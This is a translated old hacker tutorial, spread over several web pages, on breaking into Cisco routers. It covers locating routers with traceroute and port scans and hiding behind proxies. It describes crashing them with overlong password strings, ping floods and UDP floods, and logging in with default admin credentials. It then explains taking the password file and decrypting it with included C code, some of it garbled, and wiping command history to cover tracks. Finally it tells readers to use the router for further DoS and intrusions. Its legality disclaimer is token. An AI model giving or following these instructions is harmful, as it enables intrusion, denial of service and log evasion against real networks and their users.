Attacking CISCO routers

The original text comes from BlackSun, translated when you wake up from dreams. This is a very good article, and I'm very happy to share it with you!

warn:

Do not use this to destroy the cisco system or illegally access the system. This article is only for learning. It can only be used for legal behavior and cannot destroy any system. This article will show you step by step how to exploit the found flaws to gain illegal access. If you break into a cisco router, or disrupt the system, it will interrupt hundreds of network clients and cause a lot of losses. So, it can only be done if allowed, otherwise you will have a lot of trouble!

----------------------------------------------------------------------------------------------

Table of contents:

----------------------------------------------------------------------------------------------

What you need to know before you look at:

-What is an IP address?

-What is an ISP?

-What is a TCP/IP packet?

-How to hide your IP address?

-How to use Telnet?

-How to use HyperTerminal?

-How to use Ping?

-How to use TraceRoute?

-How to use a proxy server?

----------------------------------------------------------------------------------------------

-Part 1: Why attack the cisco router?

-Second paragraph: How to find a cisco router?

- Paragraph 3: How to break into a cisco router?

- Paragraph 4: How to crack the password?

- Paragraph 5: How to use a cisco router?

----------------------------------------------------------------------------------------------

You see what you need to know before:

----------------------------------------------------------------------------------------------

What is an IP address?

IP is the abbreviation of Internet Protocol. Computers use IP addresses to identify other computers in the network and connect to them. That's why you get kicked out in IRC and find your ISP and your approximate location. IP addresses are easy to obtain, basically the following methods can be used

get:

- When you visit a website, your IP is recorded

-In IRC, someone gets your IP address

- In ICQ, OICQ, you can simply get your IP address and use some widgets.

-If your computer is connected to someone, run systat to see those computers connected (displayed as IP address)

- Someone sends you an email written in a java program and you can get your IP address

There are many other ways to get IP addresses, including using some *s and backdoor programs.

-----------

What is an ISP?

ISP is the abbreviation of Internet Service Providers, through which you connect to the internet. You will connect to it after dialing. We can run a traceroute (trace path) to find our ISP (traceroute will be introduced later).

You should see something like this:

tracert 222.222.22.22

Tracing route to [221.223.24.54]

over a maximum of 30 hops.

1 147ms 122ms 132ms [222.222.22.21]<<< Your ISP

[1][2] [3] [4] [5] [6] Next page

Article entry: csh Editor in charge: csh

2 122ms 143ms 123ms [222.222.22.20]<<Preferences. You can change the buffer size here.

You can also turn "local echo" on/off. If you turn on "local echo", your computer will display whatever you entered, and the computer connected to it will display a response.

So you'll see like these:

You type "hello", what you see

hhelelollo

This is because the returned information is mixed with the content you entered. The only reason I do this is to see if the connected machine responds to my input.

By default, telnet will only connect through the telnet port, that is, break port 23. You won't just connect through port 23, so when you connect, you can change the port at will. You can change it to 25, which is the port of the mail service program. It can also be 21, which is the port of ftp. There are thousands of ports in total, so you have to choose the right port!

-----------------------------------------------------------------------------------------------

How to use a hyper terminal?

The hyper terminal can allow your computer to monitor a certain computer at any port. If there is information coming to this port, it can transmit the parts. The hyper terminal is in Start > Programs > Accessories > Communications. If not, you can install it through the control panel. First, you want to select the connection protocol. We select "TCP/IP Winsock", then enter the computer you want to connect to, and select the port below. You can select Call>Wait for Call to wait for the file. In this way, other computers can connect to you through a certain port, and you can chat or transfer files.

:My hyper terminal may be different, and it does not have this function.

----------------------------------------------------------------------------------------------

How to use Ping?

Ping is very simple to use. In MS-DOS mode, enter "ping IP address". The default is ping three times, and you can also set it yourself.

"ping ip address -t" can make it ping constantly.

Change the size of the ping to do this: "ping -l (size)"

ping is actually sending data packets to remote machines. When remote machines receive them, they will return the packets as they are. We can see the time of this process. The shorter the time, the faster the speed. Of course, packet loss will occur when it is crowded. Ping will slow down the speed of the pinged computer, and even make it down when the traffic is too high. A minute of ping attack can crash a win98 computer. (Because its connection buffer overflows - excessive connections, Windows decides to rest:>).ping attacks will also take up a lot of your bandwidth, so your bandwidth needs to be

Larger than the target machine (unless the target machine is running Windows 98 and you have a good cat, then you can call it off the stage within a minute).

Ping attacks have no effect on strong systems.

Note: The DOS's -t option is not a ping attack, it is just a small connection and has many intervals in between. In Unix or Linux machines, you can use the parameter -f to perform real ping attacks. Actually, if your distribution is POSIX-compliant (POSIX -Portable Operating System Interface based on uniX), otherwise it is not a real Unix/Linux distribution. So if you have an OS that says you are both Unix and Linux, then you have -f.

-----------------------------------------------------------------------------------------------

How to use TraceRoute?

To track your connection (you can observe the connection route of the target machine), just enter "tracert IP address" in MS-DOS mode. You will see a directory of a computer, which is the machine that passes between you and the target. .

You can use this method to determine whether a firewall exists, or you can determine someone's ISP (internet service provider).

To determine the ISP, just look at the previous IP address of the target machine, and it should be the ISP router.

Basically, this is how traceroute works - a TCP/IP packet with a value at its head (at the head of the IP. If you don't know what this means, it's okay, just keep reading). It's called TTL, which is the abbreviation of Time To Live. When a packet passes through the router, its TTL value will decrease. This may cause packets to roam around the network and consume bandwidth. So whenever a packet TTL value reaches 0, it will fail and return to the sender due to an ICMP error. Now traceroute sends a packet with a TTL value of 1 first, and it will return soon. Check the header of the ICMP error and traceroute can know where the packet passes in the first step. Then a packet with a TTL value of 2 will be sent, and after returning, it will be the place where it passes for the second time. Go down one by one, until the final destination, and you can know the entire path.

Previous page [1][2][3] [4] [5] [6] Next page

Article entry: csh Editor in charge: csh

Do you understand now? :-)

----------------------------------------------------------------------------------------------

How to use a proxy server?

Find a proxy server online, including the proxy server you need to open the port. Once found, you can connect to another computer via a proxy server using telnet or hyperterminal. This way, the other party's computer cannot determine your IP address.

----------------------------------------------------------------------------------------------

Paragraph 1: Why attack the cisco router?

You might wonder... Why attack the cisco router?

The answer is that doing so will be very useful for breaking into other systems...

Cisco routers are very fast, and in a system, some will be connected with 18 T1. And they are very flexible, although most of them runtelnets, but they can work when DoS attacks or attacks other systems.

They also have thousands of packets passing through. But it can be captured for decoding... Many cisco routers are trusted by systems, which allow you to get the exact number of other computers on their network.

-----------------------------------------------------------------------------------------------

Paragraph 2: How to find a cisco router?

Looking for a cisco router is a simple task, with almost all ISPs passing at least one cisco router. The easiest way is to run tracert under dos, you can track many computers between computers, and there must be a name "cisco". If you find it, note its IP address.

: There may not be the name cisco in China, but there must be a router. You can use SuperScan to scan the first two IP addresses to see which one opens port 2001 (Cisco router management) and port 23!

Now you have the location of the cisco router, but it may also have a firewall to protect it, so you have to check if it has been blocked for the number of times it has been blocked for ping connections, and if there is a response, it may not be blocked. Another way is to try to access some cisco router

port. You can just use telnet, port 23, if it wants to enter the password and not called enter the username, you may be in a firewall.

Try to find a router that is not protected by a firewall, because this tutorial topic is a router, not to teach you how to pass through a firewall. When you are sure to find a good system, you should find a proxy server that can use port 23 so that your IP address will not be recorded by the router

Recorded. : Just find a machine running Wingate.

-----------------------------------------------------------------------------------------------

Paragraph 3: How to break into a cisco router?

Cisco routers run versions of V4.1 (now commonly used), which is easy to get rid of. You just need to connect to a cisco router through a proxy server and enter a long string of passwords, such as:

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk

Now start waiting, the cisco system will restart, you can say that you have attacked it and put it offline...but after 2-10 minutes, it will recover and we should enter it.

If nothing happens, then it is not running fragile software. You can try several more DoS attacks, such as a large number of pings. Enter "ping -l 56550 -t" under dos, and this will have the same effect.

: It is very likely that neither of the above methods can work. Anyway, you need its down machine. Then try the udpFlood attacking yahoo, which will definitely make its down machine. Be sure to be careful! I believe you should know how to protect yourself.

Previous page [1] [2][3][4] [5] [6] Next page

Article entry: csh Editor in charge: csh

If it passively links, find another proxy server to connect. And the user name is "admin" and the password is "admin", because this is the default.

Because when it is temporarily disabled, it will return to the default state.

: When you go to my homepage, there will be an article including the default username and password of almost all routers.

Now that you have entered, you should get the password file! The system runs different software, but most of them have a prompt like "htl-textil". Now enter "?" to watch the life. You will see a lot of commands, and you will find a transmission command. With this command, in the current Admin user, send the password file to your computer port 23. But before this, you have to set up your hyper terminal. After you send the file, the hyper terminal will ask you whether you receive the file, you can select Yes and save it on your computer. Offline. You have passed the hardest part, and be prepared to start cracking the password below.

-----------------------------------------------------------------------------------------------

Paragraph 4: How to crack the password?

Now that you have obtained the password file, you have to crack it to continue to enter the router. So you can run software like John the Ripper to decipher it.

This is the easiest way I recommend. Another way is to try decoding it. Doing this requires a decoding software, and you need to be patient enough using some decoding software.

Here is a software that specifically decodes password files for cisco routers, and you can compile it in Linux:

#include

char xlat[] = {

0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,

0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,

0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44

};

char pw_str1[] = "password 7 ";

char pw_str2[] = "enable-password 7 ";

char *pname;

cdecrypt(enc_pw, dec_pw)

char *enc_pw;

char *dec_pw;

{

unsigned int seed, i, val = 0;

if(strlen(enc_pw) & 1)

return(-1);

seed = (enc_pw[0] - ?') * 10 + enc_pw[1] - ?'

if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))

return(-1);

for (i = 2 ; i <= strlen(enc_pw); i++) {

if(i !=2 && !(i & 1)) {

dec_pw[i / 2 - 2] = val ^ xlat[seed++];

val = 0;

}

val *= 16;

if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {

val += enc_pw[i] - ?'

continue;

}

if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {

val += enc_pw[i] - 'A' + 10;

continue;

}

if(strlen(enc_pw) != i)

Previous page [1] [2] [3][4][5] [6] Next page

Article entry: csh Editor in charge: csh

return(-1);

}

dec_pw[++i / 2] = 0;

return(0);

}

usage()

{

fprintf(stdout, "Usage: %s -p \n", pname);

fprintf(stdout, " %s \n", pname);

return(0);

}

main(argc,argv)

int argc;

char **argv;

{

FILE *in = stdin, *out = stdout;

char line[257];

char passwd[65];

unsigned int i, pw_pos;

pname = argv[0];

if(argc > 1)

{

if(argc > 3) {

usage();

exit(1);

}

if(argv[1][0] == '-')

{

switch(argv[1][1]) {

case 'h':

usage();

break;

case 'p':

if(cdecrypt(argv[2], passwd)) {

fprintf(stderr, "Error.\n");

exit(1);

}

fprintf(stdout, "password: %s\n", passwd);

break;

default:

fprintf(stderr, "%s: unknow option.", pname);

}

return(0);

}

if((in = fopen(argv[1], "rt")) == NULL)

exit(1);

if(argc > 2)

if((out = fopen(argv[2], "wt")) == NULL)

exit(1);

}

while(1) {

for(i = 0; i < 256; i++) {

if((line[i] = fgetc(in)) == EOF) {

if(i)

break;

fclose(in);

fclose(out);

return(0);

Previous page [1] [2] [3] [4][5][6] Next page

Article entry: csh Editor in charge: csh

}

if(line[i] == '\r')

i--;

if(line[i] == '\n')

break;

}

pw_pos = 0;

line[i] = 0;

if(!strncmp(line, pw_str1, strlen(pw_str1)))

pw_pos = strlen(pw_str1);

if(!strncmp(line, pw_str2, strlen(pw_str2)))

pw_pos = strlen(pw_str2);

if(!pw_pos) {

fprintf(stdout, "%s\n", line);

continue;

}

if(cdecrypt(&line[pw_pos], passwd)) {

fprintf(stderr, "Error.\n");

exit(1);

}

else {

if(pw_pos == strlen(pw_str1))

fprintf(out, "%s", pw_str1);

else

fprintf(out, "%s", pw_str2);

fprintf(out, "%s\n", passwd);

}

If you are not using Linux, you have to use software like John the Ripper, bring your password file to crack it out loud.

-----------------------------------------------------------------------------------------------

Paragraph 5: How to use a cisco router?

To use it, you must first connect to it, you can use a proxy to avoid your IP address being noted. When you enter, if you want to close the history to mask your behavior, you just lose "terminal history size 0". This way you won't be recorded anything! Enter "?" to see the commands in the router, most of which you can use.

These routers generally have telnet, so you can connect to other systems (such as unix boxes) through telnet and attack them. You can also use ping and traceroute to track the system or perform DoS attacks. You can also listen to packets, but I do not recommend this because it does not necessarily succeed and will be discovered...

----------------------------------------------------------------------------------------------

If you don't attack Cisco for the first time, don't worry...you can't succeed once or twice. It requires constant practice and super stamina.

Here is only to what you will do...it must be done legally!

--- Excerpted from "United Nations League"

Previous page [1] [2] [3] [4] [5][6]

Article entry: csh Editor in charge: csh